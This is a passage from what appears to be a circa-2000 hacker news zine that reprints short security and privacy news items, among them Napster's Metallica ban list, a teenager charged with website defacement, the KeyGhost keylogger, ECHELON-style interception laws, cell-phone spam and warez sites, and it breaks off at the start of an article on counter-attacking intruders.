Because of the methods employed by Metallica in assembling its list of usernames, it is possible that users have been mistakenly implicated as infringing the copyrights of songs and recordings originally included on commercially released Metallica albums. It is also possible that Metallica has correctly identified many users. Napster will reinstate those users who dispute Metallica's allegation of infringement via a sworn "counter notification" stating that they have not shared the materials to which Metallica objects, and who, after submitting the counter notification, are not made the subject of legal action by Metallica within ten (10) working days after Metallica is notified of that person's identity.

Frequently Asked Questions About Metallica's Request (FAQs)

Q: What information has Napster received from Metallica?

A: Metallica delivered a computerized list of 317,377 distinct usernames to be banned from Napster. The list contained usernames, filenames of allegedly infringing music for each user, time, date, and the IP address of the Napster server to which the user was connected. That information did not contain the user's IP address or personal information. Metallica has stated that it intends to limit the scope of its notification to commercially released Metallica albums, making "no claim of infringement with respect to recordings of songs made by fans at Metallica live concerts."

Q: How has Napster responded to this request?

A: As a DMCA compliant service, Napster feels strongly that it is important to expeditiously remove users alleged with copyright infringement. Napster has blocked all users identified by Metallica as allegedly infringing, based on Metallica's sworn allegations against these usernames. If, but only if, these users feel that they have been identified in error, they have recourse through our counter notification policy.

Q: Has Metallica requested any personal information related to Napster's users?
A: No, and no such information has been provided to them.

Q: What does Napster do with personal information provided at registration?

A: Napster archives personal information, such as user addresses, e-mail addresses, and the like, to use as general demographic information for audience measurement purposes. We do not currently associate a user's personal information with their Napster username.

Copyright 1999-2000 Napster, Inc. All rights reserved.

@HWA

35.0 [MM] ytcracker busted for web defacement
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.gazette.com/daily/top3.html

Teen accused of raiding city Web site

By Danielle Nieves/The Gazette
Edited by Mike Braham; headline by Gary Houy

A 17-year-old Colorado Springs boy was charged in juvenile court Tuesday with one count each of computer crime and criminal mischief after he broke into the city's Web site in October and replaced it with the message, "i love this city ytcracker 9d9 palmer high."

The two felony charges carry a maximum penalty of two years of juvenile detention.

The boy, known online as "ytcracker," said he is a benevolent hacker who was trying to alert officials of potential security glitches.

After discovering he had tapped into the city's Web site in October, Colorado Springs police began an investigation and said he had tampered with at least 40 other Web sites, including Airspace USA, Altamira International Bank, Nissan, Honda, the U.S. Geological Survey Monitoring Station and the Texas Department of Public Safety.

In December, not knowing of the investigation, "ytcracker" contacted the National Aeronautics and Space Administration and told them he had meddled with their Web site.

The agency teamed with Springs police, the Defense Criminal Investigative Service, the NASA computer crime division and the Texas Department of Public Safety to gather information that led to the felony charges.

"I never had any intentions of doing damage," he said. "At first it was funny, and then I wanted to alert people to the security vulnerabilities in everyday software - and the fact that no one is immune."

The boy said what began as a joke last summer turned into a precarious game between administrators of online Web sites and his own expertise.

He said he started hacking into local business sites, then graduated into more complicated systems, like the Bureau of Land Management National Training Center.

The Web sites he affected were typically dismantled for only a matter of hours, he said.

Police said he caused $25,000 damage, a figure based on the costs of installing secure sites and the time lost to users while the software was repaired.

The teen, who dropped out of school because he was "too bored," is a self-taught computer whiz who said he started using a computer when he was 2 years old.

"I understand what I did was wrong," he said. "I'm hoping something good will come out of it."

@HWA

36.0 [HNN] Junger wins in Appeals Court-Code Declared Speech
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 10th

Junger wins in Appeals Court - Code Declared Speech

contributed by Dan

The 6th Circuit Appeals Court has overturned a lower court ruling and has concluded that the First Amendment does in fact protect computer source code. Therefore they have remanded Peter Junger's case over encryption exports back to the District Court for further consideration.

6th Circuit Court Opinion
Associated Press - via World News

http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION
http://www.worldnews.com/?action
BAD URL - expired or deleted.
- Ed

@HWA

37.0 [HNN] Bullet to Scan Hard Drives of Web Site Visitors
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 10th

contributed by acopalyse

Code-named Bullet and developed by ISS, this new software lets e-commerce companies scan a Web site visitor's hard drive to see if it is infected with Trojan horses, viruses or other malicious software that could be passed on to the e-commerce site. Few details about the program are available; the release date and pricing have not yet been announced. (Are companies going to warn users before they scan them?)

CNN
http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html

Frisking computers at the door

From...

April 6, 2000
Web posted at: 8:53 a.m. EDT (1253 GMT)

by Ellen Messmer

(IDG) -- ISS has developed an intrusion-detection application, code-named Bullet, that lets e-commerce companies scan a Web site visitor's PC to see if it is infected with Trojan horses, such as Back Orifice, or viruses that could be passed on to the e-commerce site.

Trojan horses let intruders seize remote control of PCs, and that could mean a compromise of an online banking system, for example, even when the correct user identification is employed to access the site.

"Businesses are just getting fed up with the crap coming off the Internet," says ISS CEO Thomas Noonan, adding that one bank is expected to announce it is using the ISS application on its home banking site this week.

The ISS application uses ActiveX technology to scan the laptop, and if required, wipe out the unwanted, dangerous code. Noonan acknowledges that use of the scanning application could touch off an invasion-of-privacy debate.

Further details about the application were not available. ISS has not announced when the application will become generally available or how much it will cost.
@HWA

38.0 [HNN] Links to Web Sites Illegal
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 10th

contributed by Evil Wench

The Osaka District Court has ruled that under certain conditions linking one web site to another would violate the law. While slightly vague it would seem that simply linking to a site that violates the law could be charged as aiding and abetting a crime.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
BAD URL - expired or deleted. - Ed

@HWA

39.0 [HNN] British Companies Complacent
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 10th

contributed by acopalyse

A study by the Department of Trade and Industry in Britain finds that British businesses are too complacent when it comes to online security. The Information Security Breaches Survey 2000 (ISBS 2000) found that 60% of companies have suffered a security breach and that 30% do not feel they have anything worth protecting. It was also found that the average cost of each intrusion was only £20,000. The study will be released at Infosecurity Europe 2000 on 11 April at Olympia in London.

The UK Register
http://www.theregister.co.uk/000406-000023.html
BAD URL - expired or deleted. - Ed

@HWA

40.0 [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 10th

contributed by William Knowles

In the first case of its kind in Hong Kong a teenager has been sentenced to six months in jail after pleading guilty to 49 computer crime-related charges. Two other accomplices were sent to detention centers. The trio got to know each other online where they traded name and password information on various accounts. The three have been released on bail pending an appeal.
Agence France-Presse - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html

@HWA

41.0 [HNN] Census Afraid of Electronic Intrusion
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 10th

contributed by Evil Wench

While the US Census Bureau claims that it is doing everything it can to increase responsiveness it has deliberately played down the online option. The Census feels that they have not adequately tested the security options of the site. So while the site is active and available it is not being publicized. (It won't get broken into if we don't tell anyone about it.)

Online Census Form
Industry Standard - via Yahoo

http://www.2000.census.gov/
http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html

@HWA

42.0 [HNN] Hardware Key Logger Introduced
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 10th

contributed by Weld Pond

Software to monitor every key stroke has been around for a while but now a New Zealand company has introduced a hardware device that is small enough to be hidden inside the keyboard that does the same thing. The small device known as KeyGhost will monitor and record every key stroke on the keyboard and stores all data within itself. KeyGhost will retail for between $99 and $309.

ZD Net UK
http://www.zdnet.co.uk/news/2000/12/ns-14347.html

Tiny keyboard snooping device tracks passwords

Mon, 27 Mar 2000 11:06:12 GMT
Will Knight

Before you press the return button, check you're not bugged. Will Knight reports.

A tiny device that can be hidden within a keyboard or a PS/2 plug and secretly record half a million user keystrokes has been launched by New Zealand hardware manufacturer, Working Technologies.

Unlike most surveillance technologies, 'Key Ghost' does not require any software to be covertly installed.
All data is stored directly on the device and can be summoned by entering a "Personal Unlock Code" (PUC) through a keyboard. The device can then be removed and the information retrieved by another computer.

The most obvious application of this technology is to capture usernames and passwords or data that has been encrypted or otherwise protected on a machine. Working Technologies also markets the add-on as a handy data recovery tool.

Working Technologies says the FBI uses similar technology to carry out computer surveillance.

Key Ghost devices cost between $99 (£62) and $309 (£195).

@HWA

43.0 [HNN] Napalm Issue 4
     ~~~~~~~~~~~~~~~~~~~~

April 10th

contributed by Kynik

Issue 4 of Napalm has been released with articles on securing Solaris 2.x and musical intonation. (Now that's a weird mix.)

Napalm
http://napalm.firest0rm.org/

@HWA

44.0 [HNN] EU Set To Rewrite Human Rights
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th

contributed by g.machine

Rules and treaties originally drawn up fifty years ago to outline basic human rights failed to anticipate advancements in technology. Now the European Union is attempting to rewrite those rules which would include a ban on 'systematic interception' of electronic communications. This would essentially ban Echelon and Frenchelon. (Why do the Europeans seem to understand privacy so much better than US lawmakers?)

Heise
http://www.heise.de/tp/english/inhalt/co/6724/1.html

Flaw In Human Rights Uncovered

Duncan Campbell 08.04.2000

Proposals for a new definition of human rights now before the European Parliament would ban ECHELON and update data protection rules to latest developments in telecommunications technology.

International spying on communications should be identified as a breach of fundamental human rights, according to proposals now before the European Parliament.
The new proposals suggest that treaties and rules on human rights drawn up 50 years ago or more failed to anticipate how, in the Internet age, threats to personal privacy can easily cross international boundaries.

According to the five page proposal, all future interceptions must "have a legal basis, be in the public interest and be strictly limited to the achievement of the intended objective". "Any form of systematic interception cannot be regarded as consistent with that principle, even if the intended aim is to fight against international crime". "Any Member State operating such a system should cease to use it".

If implemented internationally, the new extension of human rights would outlaw the practice of signals intelligence (sigint), except when used to fight crime or terrorism. Sigint systems are now used by many large countries to spy on the diplomatic, commercial and personal communications of allies as well as enemies.

The proposals are likely to be particularly bitterly fought by the British government, whose sigint agency GCHQ co-operates with the US National Security Agency to run the world's largest communications intelligence system, including ECHELON.

MEPs will be asked to endorse proposals intended to eliminate cross-border spying between European nations as well as by nations outside the Union. The plans follow two recent parliamentary discussions about international communications surveillance, and in particular the US-run Echelon network, which collects phone call, fax and data communications from satellite communications links.

According to proposals prepared by Graham Watson, chairman of the EP Committee on Citizens' Freedoms and Rights, Justice and Home Affairs, the existing framework of human rights is defective. They "fall short of what the citizens of Europe are entitled to expect, since they do not protect them from interceptions carried out by a Member State of which they are not nationals".

"European citizens, irrespective of their nationality, are guaranteed fundamental rights at the highest possible level", Watson asserts.

If the resolution is passed by the full Parliament at a meeting in Strasbourg later this month, the EU's president will be told that there is an "urgent need" for the Council "to take ... necessary diplomatic steps to prevent third countries from carrying out any form of interception on the territory of the Union outside the framework of the joint fight against organised crime".

The President will be asked to commence diplomatic negotiations with the United States and other countries "to put an end to all forms of systematic and general espionage by third countries vis-à-vis the activities of the Member States of the Union, its institutions and its citizens".

It adds "even in the case of the fight against cross-border crime, adequate safeguards governing interceptions should be drawn up" and that "any form of interception by a Member State should be notified to the Member States on whose territory the persons whose communications are being intercepted are present".

The resolution also expresses irritation with "the current piecemeal nature of the relevant laws and operational and organisational arrangements" affecting interception in Europe. The "piecemeal arrangements" include Schengen, Europol, and the Customs Convention. According to Watson, these entail "different standards of protection" and are "free of any real democratic and judicial scrutiny". Six of 15 EU states had also failed to comply with the EC directives on data protection and on the privacy of telecommunications data.

The Committee also complains that the problems have been raised in the "numerous written and oral questions tabled on this subject over the last two years".
The proposals follow a two day hearing on data protection and surveillance, held in Brussels in February, and statements made to the Parliament by the EC and Council of Ministers at the end of March.

The Citizens Rights' Committee president is also presenting the lack of formal international communications and data privacy as a global problem. "On a world-wide scale, the rise of the information society has not been accompanied by a corresponding revision of provisions on data protection by the Council of Europe, the OECD and the WTO", he says.

The proposals call for UN guidelines on personal data and OECD guidelines on privacy to be "given the status of binding texts - at the very least between the States of the Union and their allies".

The new proposals do not include the appointment of a special Committee of Enquiry by the European Parliament, a proposal put forward last month by the Green Parties and their allies. Such a committee might have been limited to looking at breaches of existing European community law.

Instead, Watson has asked that his and two other committees be asked to prepare, by the end of the year a new and detailed report on the problem of data protection and interceptions.

@HWA

45.0 [HNN] Dutch Want Their Own Echelon
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th

contributed by root66

The Dutch Parliament is currently debating a bill that will give increased powers to the Dutch Intelligence Agency BVD. If passed the bill would allow the agency to intercept satellite communications at random and search the intercepted traffic by keywords.

Heise
http://www.heise.de/tp/english/inhalt/co/6731/1.html

Echelon in Holland

Jelle van Buuren 11.04.2000

Dutch intelligence agency authorized to scan satellite communications

The Dutch Intelligence Agency BVD is getting new powers. Among other things, the powers to intercept communications will be extended.
The agency is authorized, if the government gets its way, to intercept satellite communications at random and search the intercepted traffic by keywords. Also, the BVD gets a new intelligence task: the gathering of economical information. Holland goes Echelon, it seems.

The new 'Act on the intelligence and security agencies' (WIV), which is currently debated by Dutch parliament, gives the powers of the BVD a new legal basis. Actually, it means mainly the extension of investigative powers. In each amendment on the original proposal, new powers are given. For instance, in the first draft of the new Act, the BVD got the power to intercept, record and listen into telecommunications. In the latest amendment, from the beginning of this year, the power to 'receive' telecommunications was added. This means the BVD is authorized to directly pluck telecommunications, for instance GSM-traffic, out of the air. In this way, the BVD is no longer dependent on the willingness of telecom operators to intercept traffic, but can create for instance their own parallel network of receivers to intercept all GSM-traffic. Also, this prevents providers from 'leaking' about the fine work the BVD is doing in this area.

The biggest extension, however, is the newly added article 25a. In this article, the BVD is authorized to intercept at random all international telecommunication that is not cable bound and scan the intercepted communication on items of interest (persons, groups, keywords). According to the explanatory note by the draft Act, this kind of random interception is needed to investigate if by any chance interesting messages are part of the international communication. The government says nonchalantly that it can't be prevented that in this manner the BVD gets acquainted with the content of the intercepted communications, although that isn't - still according to the Dutch government - the main purpose of the random interception.

"The searching is primarily an instrument for the reconnaissance of the communication, to try to establish the nature of the communication and the identity of the person or organisation that is communicating. That in this way the agency gets acquainted with a part of the content of the communication is inevitable, in order to establish who is communicating and if it's a person or a group that has the interest of the agency. The searching however is not directed to get acquainted with the full content of the communication. In a certain way, this activity is comparable with the listening in on telephone conversations, to check if the connection is all right."

This seems like a very creative way of saying that interception isn't really interception, but a mere technical testing of connections. And for that, no legal or governmental warrant is needed...

Keywords

As important parts of the international telecommunications are transmitted by satellites and beam transmitters, it is clear this article 25a authorises the Dutch BVD to intercept all these communications. This means an uncontrolled authority to intercept and scan all communication that is not cable bound. This can have a great impact on the Internet traffic. As a message on the Internet chooses the least busy route, and the heart of Internet lies in the United States, there is a big chance that email sent within the Netherlands chooses an international route by satellite. In future this can also be the case for telephone conversations. All these messages can be intercepted and randomly searched. Even now, the phone conversations between two big Dutch cities, Amsterdam and Rotterdam, are being transmitted by beam transmitters.

In the first draft of the WIV, the Home secretary had to give permission to the keywords the intelligence agency is using to scan the intercepted traffic.
In the latest amendment, the Home secretary only gets once a year notification of the list of keywords, whereas the BVD is authorized to add new keywords to its own discretion. Besides that, the BVD is authorized to store all intercepted communication. Where the first proposal of the Act stipulated that the BVD has to destroy immediately all intercepted communication that isn't of interest for them, the new amendment gives the BVD the right to store all intercepted communication for a year.

In this way, the Dutch government is creating its own mini-Echelon. The BVD uses for its interception tasks the facilities of the Technical information processing centre (TIVC) of the Navy intelligence. This centre, located at the Navy complex Kattenburg in Amsterdam, decodes satellite traffic that is being intercepted by different ground stations. The TIVC is working the same way as its big brother NSA, as shown by the publication of internal documents in the Dutch daily De Haagse Courant in 1985. Satellite conversations were intercepted, recorded and selected by keywords for further analysis. The intelligence the TIVC gathered was sent to the Foreign Intelligence Service (IDB), till this unit was closed down in 1994 after a series of scandals. Since then, all signal intelligence is in the hands of Navy intelligence.

According to a study of two Dutch Intelligence experts (Bob de Graaff and Cees Wiebes, Villa Maarheeze, 1998), the TIVC is part of a broader international network and works closely with other Western agencies. For instance in 1972, the TIVC reported to the Mossad that Egypt and Libya had developed a telephone- and telex-connection under sea. Israeli special forces destroyed this connection, so Egypt and Libya had to communicate again by satellites, which were an easy target for interception.
According to the authors, the American CIA protested in 1992 firmly against the imminent dissolution of the IDB, because they were afraid Dutch signal intelligence capacity would diminish.

Vital economic interests

The new power to intercept satellite communications at random will undoubtedly be used for economic espionage. In the past, the signal intelligence capacity already served economic purposes. In the above mentioned study of the intelligence experts, examples of this are mentioned. The authors speak of an "incestuous relation" between the intelligence services and Dutch industry. Leading persons of big Dutch companies, with establishments abroad, worked for the IDB. In exchange, they got economic intelligence gathered by the TIVC. The Dutch multinational Philips has, according to the study, close relations with Dutch intelligence. The company installed interception devices in telephone centres it sold to foreign companies and governments, the report says.

In the proposed new 'Act on the intelligence and security services', the BVD gets officially the task of economic intelligence gathering. The BVD has to "protect vital economic interests", which is seen as a part of the national security.

"The Dutch economy is highly dependent of economic developments in the world; these developments are characterised by increasing internationalisation and globalisation. Decisions taken elsewhere, can have a sincere impact on the Dutch economy. It is possible to gather intelligence on these developments in different ways, for instance by cooperation with intelligence agencies of other countries. These agencies however, will take into account their own interests. In order not to be dependent of information of third parties, the government thinks it is necessary to build up its own information position and enforce it."

What exactly 'vital economic interests' are, is however wrapped in a cloud of mystery.

"To end with, we remark that with the explicitation of 'vital economic interests of the Netherlands' in the terms of reference of the BVD, also the possibility is created - if it seems appropriate - to conduct investigations in this area, where national security as such isn't in danger or is difficult to argue for."

Encryption

The new powers of the BVD are also interesting because some articles are related to cryptography and information technology. The BVD is authorized to break into homes and offices to bug keyboards. Besides that, the BVD is authorized to break into computers and steal, alter or delete information that is stored in computers. In other words, the BVD is allowed to hack. In this way, the intelligence agency can steal data from computers, manipulate software, corrupt passwords or install a Trojan Horse, so access is secured and cryptography can be bypassed.

Cryptography is a topic of special interest for the BVD. In the draft Act, the power to undo encryption is being extended. In the first proposal the BVD got the authority to decrypt encrypted communication and data "by technical means". In the latest amendment this is extended to decryption "by all possible means". According to the explanatory note, "practice has shown there are other ways than just technical means to decrypt encrypted communications." This cryptic description seems to be directed at infiltrators who diddle out passwords, or look over the shoulder when messages are encrypted, or intelligence teams breaking into homes and offices in search of the little piece of paper the password is written on.

The articles on the interception of telecommunication also contain remarks on cryptography. Encrypted messages may be kept in storage as long as is necessary for the BVD to decrypt them.
The explanatory note says: "Where telecommunication is concerned, of which the encryption is not undone, and where the mere fact that cryptography has been used makes this communication interesting for the agency, it is desirable to save this communication to the moment the capacity exists or is being developed to decrypt the communication." So the use of a perfectly normal technique to protect one's privacy, trade secrets or sensitive political information, is in the eyes of the Dutch government a highly suspected act.

The draft Act also introduces the obligation for "every one" the authorities believe has access to the keys, to cooperate with the intelligence agency in decrypting the encryption. Refusal is punishable with a sentence of two years. The Dutch parliament has asked the government if this means that suspects also are obliged to hand over the keys. The answer is not available yet. But if the government confirms this obligation also applies to suspects, this will be a clear violation of the fundamental human rights, as stated for instance in the Treaty on the protection of the Human Rights and Fundamental Freedoms. It means an obligation to cooperate on your own condemnation and the reversal of the burden of proof.

@HWA

46.0 [HNN] SPAM Goes Wireless
     ~~~~~~~~~~~~~~~~~~~~~~~~

April 12th

contributed by Evil Wench

Unsolicited commercial email is finding new ways of interrupting our lives with their unwanted and unwelcome messages. Companies are now using wireless messaging services to page people with advertisements for their products. The company responsible for the SPAM, plugout.com, said that it was only a one time occurrence and will never happen again. (That's one time too many, if everyone did it one time...)
Washington Post
http://www.washingtonpost.com/wp-dyn/business/A51301-2000Apr10.html

'Spammers' New Calling: Cell Phones

By Mike Musgrove
Washington Post Staff Writer
Tuesday, April 11, 2000; Page E01

Mike Malarkey, a business-development manager for the District-based educational Web developer Blackboard Inc., was in the middle of a meeting last Thursday when his Nokia cell phone chirped, sounding a bit like the low-battery warning.

When he checked it after the meeting, he saw that the battery was fine, but he'd just received a text message on the phone's screen--an advertisement for a Web site selling cell-phone accessories.

"I'm just surprised that it's progressed to phones," said Malarkey. He was one of the first recipients of an apparently novel kind of unsolicited electronic advertising, or "spam," sent via the text-messaging service on his ATT Wireless phone.

Another ATT customer, Laurie Ann Ryan, a public relations director who asked that her firm not be identified, was infuriated to receive the same message last Thursday: "Clearly the sender knows it's going to interrupt somebody's day."

She called the ad "excessively aggressive and invasive" because a cell phone is something users tend to carry with them all day--unlike the personal computers that e-mail spammers have targeted for years.

One veteran of the long-running fight against spammers said this abuse of ATT's system should come as no surprise. "I expect to see more of it unless this kind of thing is controlled," said Nick Nicholas, an "evangelist" at the Mail Abuse Prevention System, an organization that tries to get Internet providers to cut off spammers' access.

Nicholas noted ATT Wireless's configuration of its text-message system as a possible vulnerability: Its customers automatically get an e-mail address consisting of their phone number followed by "@mobile.att.net."

"Because of the way ATT sets up the e-mail account, all you need to do is just try consecutive numbers," he said.
Nicholas said ATT should have been able to detect this "war dialing" approach and block the spammers' access.

ATT spokeswoman Alexa Graf hadn't heard of Plugout.com's unsolicited transmission until a reporter called yesterday afternoon. "The last thing we want to do is start spamming our customers," she said.

The text messaging service is an included feature with ATT's service; customers are not billed for incoming text messages. Sprint PCS offers a similar service, while Verizon Wireless (formerly Bell Atlantic Mobile), Nextel and Cellular One charge extra for the ability to receive text alerts.

A spokesman for Sprint PCS reported no spamming incidents and said, "We have software that can detect a spam and is designed to prevent it from happening."

The company behind the ad, Plugout.com, is a Fort Lee, N.J.-based operation whose site has only been fully operational since February.

Rudy Temiz, the company's 22-year-old president, said yesterday afternoon that he didn't plan to repeat the exercise but expressed no remorse either, saying that the marketing technique had generated "quite a few" sales.

"One of the reasons we're doing this," said Temiz, "is because every single dot-com company isn't graced with venture capital and all us smaller Web sites have to find more creative ways to get on the map."

He didn't reveal how many messages had been sent out or how he had obtained his list of phone numbers but said, "We're only doing it one time. Nobody in Washington, D.C., should ever hear from us again."

Nicholas, the anti-spammer, called Temiz's marketing, "more ignorance than anything, ignorance of the economics of the Internet or of the culture of the Internet."

Vincent Zahn, Plugout.com's director of strategy, further defended the text ads. "What better way to reach your target market?" he asked, saying, "We look at it as if we're doing these people a favor if they're looking for these kinds of products."
Responded ATT customer Ryan, "They're not doing me any favors by soliciting me over my cell phone."

© 2000 The Washington Post Company

@HWA

47.0 [HNN] Forget Fort Knox Now It's Fort Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th
contributed by Code Kid

Redwood City California based Equinix has just opened its bomb proof Net shelter. The shelter is said to be more secure than Fort Knox to protect the servers of third party companies housed inside. The compound includes geometric hand-scanners, automated mantrap and other fancy security devices. Equinix has already built two such shelters on the East Coast and plans on 26 more throughout the country. (While Equinix may have the physical security they do not provide any Internet security. Doh!)

Wired
http://www.wired.com/news/technology/0,1282,35550,00.html

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000411/wr/tech_security_1.html

Equinix
http://www.equinix.com

Wired:

Net Fort Opens to Mixed Reviews
by Lynn Burke
3:00 a.m. Apr. 12, 2000 PDT

SAN JOSE, California -- The opening of the new bomb-proof Internet shelter here Tuesday was a bit like a Mafia wedding that couldn't decide whether it wanted to be top-secret or front-page news.

In the end, it ended up being neither.

The shelter, operated by Redwood City, California-based Equinix, is billed by its owners as a Fort Knox-like bunker that will protect the very infrastructure of the companies fueling the electronic economy of the United States.

Unfortunately for Equinix, the San Francisco Chronicle plastered the top-secret location of the facility on its front page Tuesday morning.

But even if the unmarked shelter is no longer such a secret, the sprawling compound -- chock-full of fancy security devices including geometric hand-scanners and automated mantraps -- does appear capable of protecting the computers housed inside from physical attack.

But is the Internet under threat of such assault?
Former National Security Advisor Mike McConnell sure thinks so.

"Look at the World Trade Center bombing," he said. "The purpose of that attack was to collapse Wall Street. If I'm the blind sheik (accused in the attack), I say, 'Well, that didn't work.'"

Going after the bank is no longer a worthwhile strategy, he said. Now you go after the bank's computers.

"If you're measuring e-commerce in billions and trillions," he said, "what Equinix has provided here, in my view, is an absolute must."

Benchmark Capital analyst Andy Rachleff, whose company helped to pony up a good chunk of the $80 million secured for second-round financing, says Equinix has hopped in front of a security trend in e-business.

"This is monstrous," he said. "If you're going to put your business on the Internet, you're going to put your servers in a facility like this."

The building, a renovated version of a former IBM facility, was rebuilt by Bechtel Corporation, the brawn behind the Hong Kong International Airport and Boston's Ted Williams Tunnel.

Bechtel has entered into a $1.2 billion contract to build 26 more of these hosting facilities. The company has already built two on the East Coast -- in Virginia and New Jersey.

Jeff Thompson, a software developer for operating systems security platforms provider Argus Systems, says sinking a bunch of capital into this kind of facility is crazy. The security industry isn't focused on external threats, he says.

"It's so much easier to break in over the public network," he said. "The real problem is how easy it is to attack a system on a public network."

Indeed, the denial-of-service attacks earlier this year on several of the Internet's biggest players were all electronically perpetrated over the Internet itself. And Equinix officials say their facility won't prevent those kinds of attacks.

"That's something our customers need to work out themselves," said vice president of sales Peter Ferris.
There's little doubt that the industry is worried about security, physical or otherwise.

According to a recent survey of Fortune 1000 corporate security professionals by security corporation Pinkerton, the potential threat to Internet sites and computer networks was identified as the industry's second-biggest security concern.

A recent survey from the Computer Security Institute and the San Francisco Federal Bureau of Investigation's Computer Intrusion Squad found that 90 percent of respondents -- primarily large corporations and government agencies -- detected computer security breaches within the last 12 months.

While no one knows whether a campaign of terror against the Internet is in the works or not, it may just be that a facility like Equinix's provides a little extra measure of comfort in an industry that is defined by volatility.

Bobby Robertson, a business developer with broadband provider Enron, said Equinix has taken security to a whole new level, and has come up with the most sophisticated hosting service he's ever seen.

"It's reassuring, for sure," he said. "I think security is very important, and this is a very thoughtful approach."

Yahoo:

SORRY! Url expired (see how badly we need news gatherers!!!!? - email me if you want to help collecting articles! tnx cruciphux@dok.org - Ed)

@HWA

48.0 [HNN] TrustedBSD Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th
contributed by tricky deamon

It seems the BSD family has a new member, TrustedBSD. TrustedBSD provides a set of trusted operating system extensions to the FreeBSD operating system, targeting the Orange Book B1 evaluation criteria.

TrustedBSD
http://www.trustedbsd.org/

@HWA

49.0 [HNN] 690,000 Illegal Web Pages on the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th
contributed by Evil Wench

Speaking in Sydney Australia last week, the president of the Business Software Alliance, Mr Robert Holleyman, said there were at least 690,000 warez, appz and crackz Web pages on the Internet. (690,000?
Who went around and counted them all? By the time they finished half of them were probably down.)

Sydney Morning Herald
http://www.smh.com.au/news/0004/11/text/bizcom04.html

Pirates display their booty on the isle of Zed

Date: 11/04/00
By PETER GOTTING

If you thought X-rated was bad, just wait till you see the Zs.

On the dark side of the Internet, the letter Z is used to pluralise almost anything that is illegal.

Thus, warez, appz or filez refer to pirated software, computer games, music and film downloads; serialz are software serial numbers and passwordz are passwords that allow free entry to subscription-based pornography sites.

For years, Internet users have swapped warez online. Those in the know can easily find a free copy of applications such as Windows 2000, Adobe Photoshop and Corel Draw; computer games such as Quake 3, KingPin and Soldier of Fortune; and even movies such as Scream 3, Star Wars and Green Mile.

On a serialz page you can retrieve serial numbers for anything from first aid computer programs to multimedia software. And throughout the sitez are banners advertising pornography and links to pages listing passwords to XXX material.

"The best illegal downloads" one site advertises; "Illegal MP3 arena" another calls itself; "100% Illegal Pirated O-Day" one boasts.

The sites are nothing new, but copyright owners are getting scared. With technological developments set to make it much easier to break the law - broadband will reduce download times dramatically - software companies are concerned.

Speaking in Sydney last week, the president of the Business Software Alliance, Mr Robert Holleyman, said there were at least 690,000 warez, appz and crackz Web pages on the Internet.

The Business Software Alliance - an international industry body representing software companies such as Microsoft, Lotus, Adobe, Novell and Symantec - estimates Internet piracy now involves more than $US1 billion ($1.67 billion) worth of software worldwide.
Mr Jim Macnamara, chairman of the alliance's local counterpart, the Business Software Association of Australia, said technological developments such as broadband and faster modems would aggravate the problem.

"It's all necessary for the e-commerce revolution to happen," Mr Macnamara said. "But, equally, we are concerned because illegal software will be easier to access."

The sites are not hidden but quite blatant, Mr Macnamara said. "They are quite unashamed. They do not do anything else. They openly boast of what they have got on them."

A disclaimer on one site warns: "If you are affiliated with any government, anti-piracy group or any other related group, or were formerly a worker of one, you CANNOT enter this Web site, cannot access any of its files and you cannot view any of the HTML files."

The sites say that threats against Internet service providers or prosecutions of people affiliated with the page would breach the US Internet Privacy Act.

Mr Macnamara suggested Internet service providers should be required to compile contact details of Web sites owners which would be available to police but not the public.

"Individual privacy should be protected but the hosts of sites should be required to keep a record of who owns that site," he said. "If you get a court order you should be able to locate who is doing that and press charges.

"Often we do not even know where they are because there's no records kept."

But the organiser of hackers group 2600 Australia, Mr Grant Bayley, said most of the sites were hosted on free Web page hosting sites such as Geocities and Angelfire, rather than through ISPs.

"A change in law won't achieve any of their objectives," he said.

Mr Bayley said 2600 did not condone any of the sites. Hackers were interested in computer security and not breaking the law; crackers access software illegally.

"The number of sites alleged to exist seems grossly exaggerated," he said.
But Mr Bayley suggested software companies should provide more programs to consumers on a free trial basis.

"It's a problem of not offering enough of a sample," he said. "People operating such sites are often under the age of 18 and do so more out of interest in a product than a desire for professional gain. These are people wanting to try out the software."

This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited.

(We disregard all such notices, news is in the public domain, we don't charge for access to these archives, if anything we're doing the site(s) a favour by disseminating their news. Legal action will result in a civil disobedience action and will incur underground continuance of our zine. - Ed)

@HWA

50.0 [HNN] Attacking the Attackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th
contributed by Evil Wench

Just how legal is it to launch a counterattack against an online attacker? Would you be committing just as big a crime as they are? How can you be sure you are counterattacking the correct target? Should laws be passed to legalize hostile responses?

CNN
http://www.cnn.com/2000/TECH/computing/04/07/self-defense.idg/index.html

Can you counter-attack hackers?

April 7, 2000
Web posted at: 10:17 a.m. EDT (1417 GMT)

by Winn Schwartau

(IDG) -- You are running a Web site. Making money perhaps, and visitors are seeing your message. Then, according to your perimeter intrusion-detection device, some online goofball or criminal hacker is beating on your door. What are you going to do?

